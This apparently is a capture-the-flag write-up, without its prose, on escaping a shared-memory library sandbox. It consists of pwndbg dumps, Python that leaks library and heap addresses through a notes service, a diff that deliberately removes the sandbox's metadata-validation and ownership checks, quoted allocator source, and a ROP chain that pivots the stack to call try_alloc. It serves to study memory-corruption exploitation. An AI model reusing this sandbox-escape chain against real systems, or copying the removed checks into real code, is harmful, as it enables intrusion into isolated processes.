76:03b0│  0x7f093d51f3b0 (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::at(unsigned long)@got.plt) —▸ 0x7f093d51724e (std::vector<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >::at(unsigned long)) ◂— endbr64
77:03b8│  0x7f093d51f3b8 (void std::__relocate_object_a<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >(std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >&)@got.plt) —▸ 0x7f093d5187fa (void std::__relocate_object_a<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > > >(std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >*, std::allocator<std::unique_ptr<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> > >&)) ◂— endbr64
78:03c0│  0x7f093d51f3c0 (std::_Tuple_impl<1ul, std::default_delete<sandbox::ExportedFunctionBase> >::_Tuple_impl()@got.plt) —▸ 0x7f093d518874 (std::_Tuple_impl<1ul, std::default_delete<sandbox::ExportedFunctionBase> >::_Tuple_impl()) ◂— endbr64
79:03c8│  0x7f093d51f3c8 (std::__uniq_ptr_impl<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >::__uniq_ptr_impl(sandbox::ExportedFunctionBase*)@got.plt) —▸ 0x7f093d5183cc (std::__uniq_ptr_impl<sandbox::ExportedFunctionBase, std::default_delete<sandbox::ExportedFunctionBase> >::__uniq_ptr_impl(sandbox::ExportedFunctionBase*)) ◂— endbr64
7a:03d0│  0x7f093d51f3d0 (malloc@got[plt]) —▸ 0x560c27bc586f (malloc) ◂— endbr64
7b:03d8│  0x7f093d51f3d8 (std::_Tuple_impl<0ul, sandbox::platform::SharedMemoryMapPOSIX<sandbox::platform::detail::SharedMemoryObjectMemFD>*, std::default_delete<sandbox::platform::SharedMemoryMapPOSIX<sandbox::platform::detail::SharedMemoryObjectMemFD> > >::_M_head(std::_Tuple_impl<0ul, sandbox::platform::SharedMemoryMapPOSIX<sandbox::platform::detail::SharedMemoryObjectMemFD>*, std::default_delete<sandbox::platform::SharedMemoryMapPOSIX<sandbox::platform::detail::SharedMemoryObjectMemFD> > >&)@got.plt) —▸ 0x7f093d5157b0 ◂— endbr64
7c:03e0│  0x7f093d51f3e0 (std::_Tuple_impl<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >::_Tuple_impl()@got.plt) —▸ 0x7f093d518792 (std::_Tuple_impl<0ul, sandbox::ExportedFunctionBase*, std::default_delete<sandbox::ExportedFunctionBase> >::_Tuple_impl()) ◂— endbr64
7d:03e8│  0x7f093d51f3e8 (unsigned long const& std::max<unsigned long>(unsigned long const&, unsigned long const&)@got.plt) —▸ 0x7f093d5170cf (unsigned long const& std::max<unsigned long>(unsigned long const&, unsigned long const&)) ◂— endbr64

# leak sandboxedlib.so and slab address
leak = view_note(0)
print_note = u64(leak[8:16])
sandboxed.address = u64(leak[8:16]) - 0xa8c3
heap = u64(leak[16:24])
print(hex(sandboxed.address))
print(hex(heap))
 
# leak library_runner
payload = flat(
    0x100, print_note,
    sandboxed.got.malloc
)
edit_note(3, payload)
 
leak = view_note(0)
library_runner.address = u64(leak[:8]) - library_runner.sym.malloc
print(hex(library_runner.address))

pwndbg> vmmap 0x7f5980010a40
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
             Start                End Perm     Size Offset File
    0x562ebb3f6000     0x562ebb3f7000 rw-p     1000  64000 /srv/app/build/library_runner
►   0x7f5980000000     0x7f59c0000000 rw-p 40000000      0 /memfd:Verona Sandbox (deleted) +0x10a40
    0x7fb116174000     0x7fb11617d000 r--p     9000      0 /srv/app/build/sandboxedlib.so

pwndbg> tel 0x7fe900010a40+0x7ef3a8
00:0000│-0c8 0x7fe9007ffde8 —▸ 0x7f01ac24ecb7 (view_note()+136) ◂— mov eax, 1
01:0008│-0c0 0x7fe9007ffdf0 ◂— 0x17ffe10
02:0010│-0b8 0x7fe9007ffdf8 ◂— 0x1f2f93b17d878a00
03:0018│-0b0 0x7fe9007ffe00 —▸ 0x7fe9007ffe20 ◂— 0x2a00000000
04:0020│-0a8 0x7fe9007ffe08 —▸ 0x55ecfee040b3 (sandbox::platform::FutexOneBitSem::futex_op(int, int, timespec const*)+73) ◂— add rsp, 0x10
05:0028│-0a0 0x7fe9007ffe10 ◂— 0
06:0030│-098 0x7fe9007ffe18 —▸ 0x55ecfedfc90e (std::experimental::fundamentals_v2::source_location::current(char const*, char const*, int, int)+43) ◂— mov rax, qword ptr [rbp - 8]
07:0038│-090 0x7fe9007ffe20 ◂— 0x2a00000000

HostServiceResponse sendRequest(HostServiceRequest req)
{
  auto written_bytes = write(PageMapUpdates, &req, sizeof(req));
  HostServiceResponse response;
  auto read_bytes = read(PageMapUpdates, &response, sizeof(response));
  UNUSED(written_bytes);
  UNUSED(read_bytes);
  return response;
}
 
uintptr_t try_dealloc(const void* addr, size_t size)
{
  HostServiceRequest req{
    DeallocChunk,
    {reinterpret_cast<uintptr_t>(addr), static_cast<uintptr_t>(size), 0, 0}};
  return sendRequest(req).error;
}
 
HostServiceResponse try_alloc(size_t size, uintptr_t meta, uintptr_t ras)
{
  return sendRequest({AllocChunk, {size, meta, ras}});
}

/**
 * The file descriptor for the pipe used to send pagemap updates to the
 * parent process.
 */
PageMapUpdates,

@@ -149,14 +149,6 @@ namespace sandbox
           continue;
         }
         HostServiceResponse reply{0, 0};
-        auto is_metaentry_valid =
-          [&](size_t size, SharedAllocConfig::Pagemap::Entry& metaentry) {
-            auto sizeclass = metaentry.get_sizeclass();
-            auto remote = metaentry.get_remote();
-            return ((remote == nullptr) ||
-                    s->contains(remote, sizeof(snmalloc::RemoteAllocator))) &&
-              (snmalloc::sizeclass_full_to_size(sizeclass) <= size);
-          };
         // No default so we get range checking.  Fallthrough returns the error
         // result.
         switch (rpc.kind)
@@ -180,11 +172,6 @@ namespace sandbox
             // case where the remote is not the single remote of the allocator
             // associated with this sandbox for use on the outside.
             SharedAllocConfig::Pagemap::Entry metaentry{meta, ras};
-            if (!is_metaentry_valid(size, metaentry))
-            {
-              reply.error = 1;
-              break;
-            }
             snmalloc::capptr::Arena<void> alloc;
             {
               auto [g, m] = s->get_memory();

  case AllocChunk:
  {
    auto size = static_cast<size_t>(rpc.args[0]);
    if (
      (size < snmalloc::MIN_CHUNK_SIZE) ||
      !snmalloc::bits::is_pow2(size))
    {
      reply.error = 3;
      break;
    }
    auto meta =
      reinterpret_cast<SharedAllocConfig::Backend::SlabMetadata*>(
        rpc.args[1]);
    auto ras = rpc.args[2];
    // `meta` refers to the pointer to the slab metadata.  This field in
    // the `Entry` is dereferenced outside of the sandbox only in the
    // case where the remote is not the single remote of the allocator
    // associated with this sandbox for use on the outside.
    SharedAllocConfig::Pagemap::Entry metaentry{meta, ras};
    snmalloc::capptr::Arena<void> alloc;
    {
      auto [g, m] = s->get_memory();
      alloc = m.alloc_range(size);
    }
    if (alloc == nullptr)
    {
      reply.error = 2;
      break;
    }
    SharedAllocConfig::Pagemap::set_metaentry(
      address_cast(alloc), size, metaentry);
 
    reply.ret = alloc.unsafe_uintptr();
    break;
  }

struct SharedAllocConfig : public snmalloc::CommonConfig
{
  using PagemapEntry = SandboxMetaEntry;
  class Pagemap
  {
    private:
      /* ... */
    public:
      using Entry = PagemapEntry;
      /* ... */
  }
};
 
class SandboxMetaEntry
: public snmalloc::FrontendMetaEntry<snmalloc::FrontendSlabMetadata>
{
  /**
   * Bit set if this metaentry is owned by the sandbox.
   */
  static constexpr snmalloc::address_t SANDBOX_BIT = 1 << 3;
 
public:
  /**
   * Inherit all constructors.
   */
  using snmalloc::FrontendMetaEntry<
    snmalloc::FrontendSlabMetadata>::FrontendMetaEntry;
 
  /**
   * Does this metaentry correspond to sandbox-owned memory
   */
  bool is_sandbox_owned() const
  {
    return (meta & SANDBOX_BIT) == SANDBOX_BIT;
  }
 
  /**
   * Claim this entry for the sandbox.
   */
  void claim_for_sandbox()
  {
    meta |= SANDBOX_BIT;
  }
 
  [[nodiscard]] bool is_unowned() const
  {
    auto m = meta & ~SANDBOX_BIT;
    return ((m == 0) || (m == META_BOUNDARY_BIT)) &&
      (remote_and_sizeclass == 0);
  }
 
  [[nodiscard]] SNMALLOC_FAST_PATH snmalloc::FrontendSlabMetadata*
  get_slab_metadata() const
  {
    SNMALLOC_ASSERT(get_remote() != nullptr);
    auto m = meta & ~(SANDBOX_BIT | META_BOUNDARY_BIT);
    return snmalloc::unsafe_from_uintptr<snmalloc::FrontendSlabMetadata>(m);
  }
};
 
class FrontendMetaEntry : public MetaEntryBase
{
  /**
   * Ensure that the template parameter is valid.
   */
  static_assert(
    std::is_convertible_v<BackendSlabMetadata, FrontendSlabMetadata>,
    "The front end requires that the back end provides slab metadata that is "
    "compatible with the front-end's structure");
 
public:
  using SlabMetadata = BackendSlabMetadata;
 
  constexpr FrontendMetaEntry() = default;
 
  /**
   * Constructor, provides the remote and sizeclass embedded in a single
   * pointer-sized word.  This format is not guaranteed to be stable and so
   * the second argument of this must always be the return value from
   * `get_remote_and_sizeclass`.
   */
  SNMALLOC_FAST_PATH
  FrontendMetaEntry(BackendSlabMetadata* meta, uintptr_t remote_and_sizeclass)
  : MetaEntryBase(
      unsafe_to_uintptr<BackendSlabMetadata>(meta), remote_and_sizeclass)
  {
    SNMALLOC_ASSERT_MSG(
      (REMOTE_BACKEND_MARKER & remote_and_sizeclass) == 0,
      "Setting a backend-owned value ({}) via the front-end interface is not "
      "allowed",
      remote_and_sizeclass);
    remote_and_sizeclass &= ~REMOTE_BACKEND_MARKER;
  }
  /* ... */
};

@@ -195,7 +182,6 @@ namespace sandbox
               reply.error = 2;
               break;
             }
-            metaentry.claim_for_sandbox();
             SharedAllocConfig::Pagemap::set_metaentry(
               address_cast(alloc), size, metaentry);

Library::~Library()
{
  wait_for_child_exit();
  {
    auto [g, pm] = SharedAllocConfig::Pagemap::get_pagemap_writeable();
    snmalloc::address_t base =
      snmalloc::address_cast(memory_provider.base_address());
    auto top = snmalloc::address_cast(memory_provider.top_address());
    SharedAllocConfig::Pagemap::Entry empty{nullptr, 0};
    // Scan the pagemap for all memory associated with this and deallocate
    // the metaslabs.  Note that we don't need to do any cleanup for the
    // memory referenced by these metaslabs: it will all go away when the
    // shared memory region is deallocated.
    for (snmalloc::address_t a = base; a < top; a += snmalloc::MIN_CHUNK_SIZE)
    {
      auto& meta = SharedAllocConfig::Pagemap::get_metaentry_mut(a);
      if (!meta.is_backend_owned())
      {
        auto* remote = meta.get_remote();
        if (
          (remote != nullptr) &&
          !contains(remote, sizeof(snmalloc::RemoteAllocator)))
        {
          delete meta.get_slab_metadata();
        }
      }
      meta = empty;
    }
  }
  shared_mem->destroy();
}

pop rdi ;
ret ;
 
pop rsi ;
pop rbp ;
ret ;
 
pop rdx ;
and dh, bh ;
dec ecx ;
ret ;

ret ;                0x00
pop rdi ;            0x08
ret ;
0x4000 ;             0x08
pop rsi ;            0x18
pop rbp ;
ret ;
addr_to_free ;       0x20
rbp_from_gdb ;       0x28
pop rbx ;            0x30
pop r12 ;
ret ;
0xffffffffffffffff ; 0x38
0xdeadbeef ;         0x40
pop rdx ;            0x48
and dh, bh ;
dec ecx ;
ret ;
0x800 ;              0x50
try_alloc ;          0x58
pop rsp ;            0x60
pop rbp ;
ret ;
return_to ;

pwndbg> tel $heap+0x7ef450
00:0000│+090 0x7f5b807ffe90 —▸ 0x7f5b807ffec0 —▸ 0x7f5b807ffee0 —▸ 0x7f5b807fff00 —▸ 0x7f5b807fffe0 ◂— ...
01:0008│+098 0x7f5b807ffe98 —▸ 0x7ec3cc434e04 (sandbox::ExportedFunction<bool>::operator()(void*)+102) ◂— mov rdx, qword ptr [rbp - 8]